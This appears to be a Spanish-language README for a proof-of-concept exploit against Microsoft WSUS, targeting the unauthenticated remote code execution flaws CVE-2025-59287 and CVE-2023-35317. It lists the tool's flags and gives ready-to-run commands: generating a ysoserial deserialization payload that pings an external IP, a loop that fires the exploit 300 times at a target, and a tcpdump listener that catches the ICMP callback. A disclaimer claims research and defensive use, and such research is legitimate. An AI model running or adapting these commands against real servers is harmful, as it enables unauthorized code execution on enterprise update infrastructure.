
PoC de RCE no autenticada en Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317
Dentro de CVE-2025-59287: SoapFormatter RCE en WSUS: https://shellcode.blog/wsus-cve-2025-59287-investigation/
Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto donde se autorice explícitamente. Los mantenedores del proyecto no son responsables ni se les puede exigir responsabilidad por el mal uso del software. Úselo de manera responsable.
Indicadores obligatorios:
--target-url – URL base del servidor WSUS objetivo, ej. http://WIN-246JC0TE3BB.vuln.local:8530--cve – Uno de CVE-2023-35317 o CVE-2025-59287Indicadores opcionales:
--dns-name – Nombre DNS del cliente utilizado en las solicitudes SOAP (por defecto: )bugcrowd.local--random – Anteponer a --dns-name un subdominio aleatorio para que cada ejecución aparezca como un nuevo cliente--payload – Carga útil personalizada codificada en base64 de ysoserial; si se omite, se utiliza una carga útil incorporada para el --cve seleccionado--debug – Habilitar registro de depuración detallado (líneas [DEBUG])python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --randompython3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (o confíe en la carga útil incorporada para --cve CVE-2023-35317)for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;donesudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done